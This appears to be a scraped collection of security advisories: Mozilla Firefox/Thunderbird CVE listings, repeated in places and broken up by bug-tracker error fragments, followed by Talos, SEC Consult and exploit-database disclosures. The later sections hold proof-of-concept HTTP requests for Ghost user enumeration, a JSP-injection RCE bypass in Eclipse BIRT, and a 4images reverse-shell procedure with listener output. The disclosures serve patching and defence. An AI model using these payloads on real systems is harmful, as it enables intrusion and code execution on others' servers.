When resizing a popup after requesting fullscreen access, the popup would not display the fullscreen notification. This vulnerability affects Firefox < 98, Firefox ESR < 91.7, and Thunderbird < 91.7.

**Mozilla Foundation Security Advisory 2022-12**

Announced

March 8, 2022

Impact

high

Products

Thunderbird

Fixed in

*   Thunderbird 91.7

_In general, these flaws cannot be exploited through email in the Thunderbird product because scripting is disabled when reading mail, but are potentially risks in browser or browser-like contexts._

**#CVE-2022-26383: Browser window spoof using fullscreen mode**

Reporter

Irvan Kurniawan

Impact

high

**Description**

When resizing a popup after requesting fullscreen access, the popup would not display the fullscreen notification.

**References**

*   Bug 1742421

**#CVE-2022-26384: iframe allow-scripts sandbox bypass**

Reporter

Ed McManus

Impact

high

**Description**

If an attacker could control the contents of an iframe sandboxed with allow-popups but not allow-scripts, they were able to craft a link that, when clicked, would lead to JavaScript execution in violation of the sandbox.

**References**

*   Bug 1744352

**#CVE-2022-26387: Time-of-check time-of-use bug when verifying add-on signatures**

Reporter

Armin Ebert

Impact

high

**Description**

When installing an add-on, Thunderbird verified the signature before prompting the user; but while the user was confirming the prompt, the underlying add-on file could have been modified and Thunderbird would not have noticed.

**References**

*   Bug 1752979

**#CVE-2022-26381: Use-after-free in text reflows**

Reporter

Mozilla Fuzzing Team and Hossein Lotfi of Trend Micro Zero Day Initiative

Impact

high

**Description**

An attacker could have caused a use-after-free by forcing a text reflow in an SVG object leading to a potentially exploitable crash.

**References**

*   Bug 1736243

**#CVE-2022-26386: Temporary files downloaded to /tmp and accessible by other local users**

Reporter

attila

Impact

low

**Description**

Previously Thunderbird for macOS and Linux would download temporary files to a user-specific directory in /tmp, but this behavior was changed to download them to /tmp where they could be affected by other local users. This behavior was reverted to the original, user-specific directory.  
_This bug only affects Thunderbird for macOS and Linux. Other operating systems are unaffected._

**References**

*   Bug 1752396

CVE-2022-26383: Security Vulnerabilities fixed in Thunderbird 91.7

Web-accessible extension pages (pages with a moz-extension:// scheme) were not correctly enforcing the frame-ancestors directive when it was used in the Web Extension's Content Security Policy. This vulnerability affects Firefox < 97, Thunderbird < 91.6, and Firefox ESR < 91.6.

Sorry, I can't find "_1745566?cve=title_". It does not seem like bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2022-22761: Invalid Bug ID

If a document created a sandboxed iframe without <code>allow-scripts</code>, and subsequently appended an element to the iframe's document that e.g. had a JavaScript event handler - the event handler would have run despite the iframe's sandbox. This vulnerability affects Firefox < 97, Thunderbird < 91.6, and Firefox ESR < 91.6.

**Mozilla Foundation Security Advisory 2022-06**

Announced

February 8, 2022

Impact

high

Products

Thunderbird

Fixed in

*   Thunderbird 91.6

_In general, these flaws cannot be exploited through email in the Thunderbird product because scripting is disabled when reading mail, but are potentially risks in browser or browser-like contexts._

**#CVE-2022-22753: Privilege Escalation to SYSTEM on Windows via Maintenance Service**

Reporter

Seb Patane

Impact

high

**Description**

A Time-of-Check Time-of-Use bug existed in the Maintenance (Updater) Service that could be abused to grant Users write access to an arbitrary directory. This could have been used to escalate to SYSTEM access.  
_This bug only affects Thunderbird on Windows. Other operating systems are unaffected._

**References**

*   Bug 1732435

**#CVE-2022-22754: Extensions could have bypassed permission confirmation during update**

Reporter

Rob Wu

Impact

high

**Description**

If a user installed an extension of a particular type, the extension could have auto-updated itself and while doing so, bypass the prompt which grants the new version the new requested permissions.

**References**

*   Bug 1750565

**#CVE-2022-22756: Drag and dropping an image could have resulted in the dropped object being an executable**

Reporter

Abdulrahman Alqabandi

Impact

moderate

**Description**

If a user was convinced to drag and drop an image to their desktop or other folder, the resulting object could have been changed into an executable script which would have run arbitrary code after the user clicked on it.

**References**

*   Bug 1317873

**#CVE-2022-22759: Sandboxed iframes could have executed script if the parent appended elements**

Reporter

Johan Carlsson

Impact

moderate

**Description**

If a document created a sandboxed iframe without allow-scripts, and subsequently appended an element to the iframe's document that e.g. had a JavaScript event handler - the event handler would have run despite the iframe's sandbox.

**References**

*   Bug 1739957

**#CVE-2022-22760: Cross-Origin responses could be distinguished between script and non-script content-types**

Reporter

Luan Herrera

Impact

moderate

**Description**

When importing resources using Web Workers, error messages would distinguish the difference between application/javascript responses and non-script responses. This could have been abused to learn information cross-origin.

**References**

*   Bug 1740985
*   Bug 1748503

**#CVE-2022-22761: frame-ancestors Content Security Policy directive was not enforced for framed extension pages**

Reporter

Mart Gil Robles (Mart at FlowCrypt)

Impact

moderate

**Description**

Web-accessible extension pages (pages with a moz-extension:// scheme) were not correctly enforcing the frame-ancestors directive when it was used in the Web Extension's Content Security Policy.

**References**

*   Bug 1745566

**#CVE-2022-22763: Script Execution during invalid object state**

Reporter

Mozilla Fuzzing Team

Impact

moderate

**Description**

When a worker is shutdown, it was possible to cause script to run late in the lifecycle, at a point after where it should not be possible.

**References**

*   Bug 1740534

**#CVE-2022-22764: Memory safety bugs fixed in Thunderbird 91.6**

Reporter

Mozilla developers and community

Impact

high

**Description**

Mozilla developers and community members Paul Adenot and the Mozilla Fuzzing Team reported memory safety bugs present in Thunderbird 91.5. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Thunderbird 91.6

CVE-2022-22759: Security Vulnerabilities fixed in Thunderbird 91.6

Mozilla developers Kershaw Chang, Ryan VanderMeulen, and Randell Jesup reported memory safety bugs present in Firefox 97. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 98.

**Mozilla Foundation Security Advisory 2022-10**

Announced

March 8, 2022

Impact

high

Products

Firefox

Fixed in

*   Firefox 98

**#CVE-2022-26383: Browser window spoof using fullscreen mode**

Reporter

Irvan Kurniawan

Impact

high

**Description**

When resizing a popup after requesting fullscreen access, the popup would not display the fullscreen notification.

**References**

*   Bug 1742421

**#CVE-2022-26384: iframe allow-scripts sandbox bypass**

Reporter

Ed McManus

Impact

high

**Description**

If an attacker could control the contents of an iframe sandboxed with allow-popups but not allow-scripts, they were able to craft a link that, when clicked, would lead to JavaScript execution in violation of the sandbox.

**References**

*   Bug 1744352

**#CVE-2022-26387: Time-of-check time-of-use bug when verifying add-on signatures**

Reporter

Armin Ebert

Impact

high

**Description**

When installing an add-on, Firefox verified the signature before prompting the user; but while the user was confirming the prompt, the underlying add-on file could have been modified and Firefox would not have noticed.

**References**

*   Bug 1752979

**#CVE-2022-26381: Use-after-free in text reflows**

Reporter

Mozilla Fuzzing Team and Hossein Lotfi of Trend Micro Zero Day Initiative

Impact

high

**Description**

An attacker could have caused a use-after-free by forcing a text reflow in an SVG object leading to a potentially exploitable crash.

**References**

*   Bug 1736243

**#CVE-2022-26382: Autofill Text could be exfiltrated via side-channel attacks**

Reporter

Young Min Kim

Impact

moderate

**Description**

While the text displayed in Autofill tooltips cannot be directly read by JavaScript, the text was rendered using page fonts. Side-channel attacks on the text by using specially crafted fonts could have lead to this text being inferred by the webpage.

**References**

*   Bug 1741888

**#CVE-2022-26385: Use-after-free in thread shutdown**

Reporter

bo13oy of Cyber Kunlun Lab

Impact

moderate

**Description**

In unusual circumstances, an individual thread may outlive the thread's manager during shutdown. This could have led to a use-after-free causing a potentially exploitable crash.

**References**

*   Bug 1747526

**#CVE-2022-0843: Memory safety bugs fixed in Firefox 98**

Reporter

Mozilla developers

Impact

moderate

**Description**

Mozilla developers Kershaw Chang, Ryan VanderMeulen, and Randell Jesup reported memory safety bugs present in Firefox 97. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 98

CVE-2022-0843: Security Vulnerabilities fixed in Firefox 98

When importing resources using Web Workers, error messages would distinguish the difference between <code>application/javascript</code> responses and non-script responses. This could have been abused to learn information cross-origin. This vulnerability affects Firefox < 97, Thunderbird < 91.6, and Firefox ESR < 91.6.

Sorry, I can't find "_1748503?cve=title_". It does not seem like bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2022-22760: Invalid Bug ID

Under certain circumstances, a JavaScript alert (or prompt) could have been shown while another website was displayed underneath it. This could have been abused to trick the user. <br>*This bug only affects Firefox for Android. Other operating systems are unaffected.*. This vulnerability affects Firefox < 97.

Sorry, I can't find "_1743931?cve=title_". It does not seem like bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2022-22762: Invalid Bug ID

Removing an XSLT parameter during processing could have lead to an exploitable use-after-free. We have had reports of attacks in the wild abusing this flaw. This vulnerability affects Firefox < 97.0.2, Firefox ESR < 91.6.1, Firefox for Android < 97.3.0, Thunderbird < 91.6.2, and Focus < 97.3.0.

Sorry, I can't find "_1758062?cve=title_". It does not seem like bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2022-26485: Invalid Bug ID

A user enumeration vulnerability exists in the login functionality of Ghost Foundation Ghost 5.9.4. A specially-crafted HTTP request can lead to a disclosure of sensitive information. An attacker can send a series of HTTP requests to trigger this vulnerability.

**SUMMARY**

A user enumeration vulnerability exists in the login functionality of Ghost Foundation Ghost 5.9.4. A specially-crafted HTTP request can lead to a disclosure of sensitive information. An attacker can send a series of HTTP requests to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Ghost Foundation Ghost 5.9.4

**PRODUCT URLS**

Ghost - http://www.ghost.org

**CVSSv3 SCORE**

5.3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

**CWE**

CWE-204 - Response Discrepancy Information Exposure

**DETAILS**

Ghost is a content management system with tools to build a website, publish content and send newsletters. Ghost offers paid subscriptions to members and supports a number of integrations with external services.

A commonly overlooked vulnerabilty in web applications allows attackers to enumerate user accounts for an application. This type of vulnerabilty has minimal impact in general, as the attacker would still be required to guess a valid password. To mitigate bruteforce password attempts, Ghost leverages a third party library for maintaining access attempts and implements longer and longer timeout periods before allowing further requests from a host. Any system that uses email addresses for usernames allows attackers to still leverage the ability to enumerate valid users without directly targetting the authentication of the system. For example, it is trivial to harvest valid email addresses for an organization through other external means. If an organization is small enough, or the attacker is further able to narrow down potential users of the system, the attacker can use this type of attack to validate which users to attack using phishing attacks, exploit kits, etc.

OWASP - WSTG-IDNT-04

**Exploit Proof of Concept**

Request:

    POST /ghost/api/admin/session HTTP/1.1
    Host: localhost:3001
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
    Accept: text/plain, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    X-Ghost-Version: 5.12
    App-Pragma: no-cache
    X-Requested-With: XMLHttpRequest
    Content-Length: 64
    Origin: http://localhost:3001
    DNT: 1
    Connection: close
    Referer: http://localhost:3001/ghost/
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    {"username":"lkjasdfklasjdf@asdf.com","password":"asdfasdfasdf"}
    

Response:

    HTTP/1.1 404 Not Found
    X-Powered-By: Express
    Cache-Control: no-cache, private, no-store, must-revalidate, max-stale=0, post-check=0, pre-check=0
    Access-Control-Allow-Origin: http://localhost:3001
    Vary: Origin, Accept-Encoding
    Content-Type: application/json; charset=utf-8
    Content-Length: 227
    ETag: W/"e3-u3gQCrLnLzZLBfGsRRRY7NHIbRI"
    Date: Fri, 23 Sep 2022 20:39:45 GMT
    Connection: close
    
    {"errors":[{"message":"There is no user with that email address.","context":null,"type":"NotFoundError","details":null,"property":null,"help":null,"code":null,"id":"dbc5eba0-3b7f-11ed-927a-a985a499596d","ghostErrorCode":null}]}
    

**TIMELINE**

2022-10-26 - Vendor Disclosure  
2022-10-26 - Initial Vendor Contact  
2022-12-28 - Public Release

Dave McDaniel and other members of Cisco Talos.

CVE-2022-41697: TALOS-2022-1625 || Cisco Talos Intelligence Group

Eclipse Business Intelligence Reporting Tool versions 4.11.0 and below suffer from a bypass vulnerability that allows for remote code execution.

SEC Consult Vulnerability Lab Security Advisory < 20221216-0 >  
=======================================================================  
               title: Remote code execution - CVE-2021-34427 bypass  
             product: Eclipse Business Intelligence Reporting Tool (BiRT)  
  vulnerable version: <= 4.11.0  
       fixed version: 4.12  
          CVE number: CVE-2021-34427  
              impact: High  
            homepage: https://eclipse.github.io/birt-website/  
               found: 2022-10-05  
                  by: Armin Stock (Atos)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"With BIRT you can create data visualizations, dashboards and reports  
that can be embedded into web applications and rich clients. Make information out  
of your data!"

https://eclipse.github.io/birt-website/

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

Vulnerability overview/description:  
-----------------------------------  
1) Remote code execution - CVE-2021-34427 bypass  
The vulnerability described in CVE-2021-34427 (https://www.cvedetails.com/cve/CVE-2021-34427/)  
allows an attacker to execute code on the server, by creating a `.jsp` file  
with the `BiRT - WebViewerExample`. This was fixed with the following code:

-------------------------------------------------------------------------------  
// viewer/org.eclipse.birt.report.viewer/birt/WEB-INF/classes/org/eclipse/birt/report/context/ViewerAttributeBean.java#L1081  
  protected static void checkExtensionAllowedForRPTDocument(String rptDocumentName) throws ViewerException {  
    int extIndex = rptDocumentName.lastIndexOf(".");  
    String extension = null;  
    boolean validExtension = true;

    if (extIndex > -1 && (extIndex + 1) < rptDocumentName.length()) {  
      extension = rptDocumentName.substring(extIndex + 1);

      if (!disallowedExtensionsForRptDocument.isEmpty()  
          && disallowedExtensionsForRptDocument.contains(extension)) {  
        validExtension = false;  
      }

      if (!allowedExtensionsForRptDocument.isEmpty() && !allowedExtensionsForRptDocument.contains(extension)) {  
        validExtension = false;  
      }

      if (!validExtension) {  
        throw new ViewerException(BirtResources.getMessage(  
            ResourceConstants.ERROR_INVALID_EXTENSION_FOR_DOCUMENT_PARAMETER, new String[] { extension }));  
      }

    }  
  }  
-------------------------------------------------------------------------------

This fix can be easily bypassed by adding `/.` to the filename which allows  
an attacker to execute arbitrary code.

Proof of concept:  
-----------------  
1) Remote code execution - CVE-2021-34427 bypass  
The old exploit results in an error message:

-------------------------------------------------------------------------------  
GET /birt/document?__report=test.rptdesign&sample=<@urlencode_all><%  out.println("OS: " + System.getProperty("os.name"));  out.println("Current dir: " +   
getServletContext().getRealPath("/"));%><@/urlencode_all>&__document=<@urlencode>./test/info-new.jsp<@/urlencode> HTTP/1.1  
Host: IP:18080  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.8,de-DE;q=0.5,de;q=0.3  
Accept-Encoding: gzip, deflate  
Connection: close  
Cookie: JSESSIONID=C2A5FE509AD277742111569F8656881A  
Upgrade-Insecure-Requests: 1  
-------------------------------------------------------------------------------

Response:  
-------------------------------------------------------------------------------  
HTTP/1.1 200  
Set-Cookie: JSESSIONID=A1E37E7FEC80DFFF155CAF9F642ADEB7; Path=/birt; HttpOnly  
Content-Type: text/html;charset=utf-8  
Date: Wed, 05 Oct 2022 06:14:54 GMT  
Connection: close  
Content-Length: 4644

<html>  
<head>  
<title>Error</title>  
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"/>  
</head>  
<body>  
<div id="birt_errorPage" style="color:red">  
<span id="error_icon"  style="cursor:pointer" onclick="if (document.getElementById('error_detail').style.display == 'none') { document.getElementById('error_icon').innerHTML = '- ';   
document.getElementById('error_detail').style.display = 'block'; }else { document.getElementById('error_icon').innerHTML = '+ '; document.getElementById('error_detail').style.display = 'none'; }" > +   
</span>

Invalid extension - "jsp" for the __document parameter.  
-------------------------------------------------------------------------------

But adding `/.` to the end of the filename creates the file on the server as  
before:

-------------------------------------------------------------------------------  
GET /birt/document?__report=test.rptdesign&sample=<@urlencode_all><%  out.println("OS: " + System.getProperty("os.name"));  out.println("Current dir: " +   
getServletContext().getRealPath("/"));%><@/urlencode_all>&__document=<@urlencode>./test/info-new.jsp/.<@/urlencode> HTTP/1.1  
Host: IP:18080  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.8,de-DE;q=0.5,de;q=0.3  
Accept-Encoding: gzip, deflate  
Connection: close  
Cookie: JSESSIONID=C2A5FE509AD277742111569F8656881A  
Upgrade-Insecure-Requests: 1

-------------------------------------------------------------------------------

-------------------------------------------------------------------------------  
HTTP/1.1 200  
Set-Cookie: JSESSIONID=5CC070E6E07D94816BF67A162E7DD8D2; Path=/birt; HttpOnly  
Content-Type: text/html;charset=utf-8  
Date: Wed, 05 Oct 2022 05:26:01 GMT  
Connection: close  
Content-Length: 283

<html><head><title>Complete</title><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"></head>  
<body style="background-color: #ECE9D8;">  
<div style="font-size:10pt;"><font color="black">  
The report document file has been generated successfully.</font>  
</div></body></html>  
-------------------------------------------------------------------------------

This allows the execution of the provided `JSP` code, by calling  
`/birt/test/info-new.jsp`.

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested, but all versions <= 4.11 are vulnerable.  
* 4.10.0 (2022-10-01)

Vendor contact timeline:  
------------------------  
2022-11-07: Vendor contacted via bugs.eclipse.org (https://bugs.eclipse.org/bugs/show_bug.cgi?id=580994)  
2022-11-17: Vendor confirmed the bypass and is working on a fix.  
2022-11-17: Vendor provided a fix.  
2022-11-27: The fix was tested and could be bypassed again.  
2022-11-27: Vendor acknowledged the bypass and provided a new fix.  
2022-11-28: The fix was tested and we were not able to bypass it.  
2022-11-30: Vendor releases patched version 4.12  
2022-12-16: Public release of security advisory.

Solution:  
---------  
Update Eclipse BIRT to version 4.12 or newer from the vendor's website:  
https://projects.eclipse.org/projects/technology.birt/releases/4.12.0

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Armin Stock / @2022

Eclipse Business Intelligence Reporting Tool 4.11.0 Remote Code Execution

4images version 1.9 suffers from a remote command execution vulnerability.

    # Exploit Title: 4images 1.9 - Remote Command Execution# Exploit Author: Andrey Stoykov# Software Link: https://www.4homepages.de/download-4images# Version: 1.9# Tested on: Ubuntu 20.04To reproduce do the following:1. Login as administrator user2. Browse to "General" -> " Edit Templates" -> "Select Template Pack" -> "default_960px" -> "Load Theme"3. Select Template "categories.html"4. Paste reverse shell code5. Click "Save Changes"6. Browse to "http://host/4images/categories.php?cat_id=1"// HTTP POST request showing reverse shell payloadPOST /4images/admin/templates.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]__csrf=c39b7dea0ff15442681362d2a583c7a9&action=savetemplate&content=[REVERSE_SHELL_CODE]&template_file_name=categories.html&template_folder=default_960px[...]// HTTP redirect response to specific templateGET /4images/categories.php?cat_id=1 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]# nc -kvlp 4444listening on [any] 4444 ...connect to [127.0.0.1] from localhost [127.0.0.1] 43032Linux kali 6.0.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.0.7-1kali1 (2022-11-07) x86_64 GNU/Linux 13:54:28 up  2:18,  2 users,  load average: 0.09, 0.68, 0.56USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHATkali     tty7     :0               11:58    2:18m  2:21   0.48s xfce4-sessionkali     pts/1    -                11:58    1:40  24.60s  0.14s sudo suuid=1(daemon) gid=1(daemon) groups=1(daemon)/bin/sh: 0: can't access tty; job control turned off$

Tag

#firefox